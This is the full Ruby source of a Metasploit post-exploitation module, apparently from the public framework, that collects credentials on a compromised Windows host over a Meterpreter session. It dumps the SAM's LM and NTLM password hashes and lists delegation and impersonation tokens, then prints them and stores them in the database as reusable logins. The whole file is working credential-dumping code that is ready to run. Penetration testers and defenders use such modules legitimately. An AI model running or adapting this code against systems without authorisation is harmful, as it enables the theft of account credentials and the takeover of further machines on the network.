1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Report
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Gather Credential Collector',
14
        'Description' => %q{
15
          This module harvests credentials found on the host and stores them in the database.
16
        },
17
        'License' => MSF_LICENSE,
18
        'Author' => [ 'tebo[at]attackresearch.com'],
19
        'Platform' => [ 'win' ],
20
        'SessionTypes' => [ 'meterpreter'],
21
        'Notes' => {
22
          'Stability' => [CRASH_SAFE],
23
          'SideEffects' => [],
24
          'Reliability' => []
25
        },
26
        'Compat' => {
27
          'Meterpreter' => {
28
            'Commands' => %w[
29
              incognito_list_tokens
30
              priv_passwd_get_sam_hashes
31
            ]
32
          }
33
        },
34
        'References' => [
35
          [ 'ATT&CK', Mitre::Attack::Technique::T1003_OS_CREDENTIAL_DUMPING ]
36
        ]
37
      )
38
    )
39
  end
40

41
  def run
42
    hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']
43
    print_status("Running module against #{hostname} (#{session.session_host})")
44

45
    # Make sure we're rockin Priv and Incognito
46
    session.core.use('priv') if !session.priv
47
    session.core.use('incognito') if !session.incognito
48

49
    # It wasn't me mom! Stinko did it!
50
    begin
51
      hashes = client.priv.sam_hashes
52
    rescue StandardError
53
      fail_with(Failure::Unknown, "Error accessing hashes, did you migrate to a process that matched the target's architecture?")
54
    end
55

56
    # Target infos for the db record
57
    addr = session.session_host
58
    # client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
59

60
    # Record hashes to the running db instance
61
    print_good('Collecting hashes...')
62

63
    hashes.each do |hash|
64
      # Build service information
65
      service_data = {
66
        address: addr,
67
        port: 445,
68
        service_name: 'smb',
69
        protocol: 'tcp'
70
      }
71

72
      # Build credential information
73
      credential_data = {
74
        origin_type: :session,
75
        session_id: session_db_id,
76
        post_reference_name: refname,
77
        private_type: :ntlm_hash,
78
        private_data: hash.lanman + ':' + hash.ntlm,
79
        username: hash.user_name,
80
        workspace_id: myworkspace_id
81
      }
82

83
      credential_data.merge!(service_data)
84
      credential_core = create_credential(credential_data)
85

86
      # Assemble the options hash for creating the Metasploit::Credential::Login object
87
      login_data = {
88
        core: credential_core,
89
        status: Metasploit::Model::Login::Status::UNTRIED,
90
        workspace_id: myworkspace_id
91
      }
92

93
      login_data.merge!(service_data)
94
      create_credential_login(login_data)
95

96
      print_line "    Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
97
    end
98

99
    # Record user tokens
100
    tokens = session.incognito.incognito_list_tokens(0)
101
    raise Rex::Script::Completed if !tokens
102

103
    # Meh, tokens come to us as a formatted string
104
    print_good 'Collecting tokens...'
105
    (tokens['delegation'] + tokens['impersonation']).split("\n").each do |token|
106
      data = {}
107
      data[:host] = addr
108
      data[:type] = 'smb_token'
109
      data[:data] = token
110
      data[:update] = :unique_data
111

112
      print_line "    #{data[:data]}"
113

114
      report_note(data)
115
    end
116
  end
117
end
118

119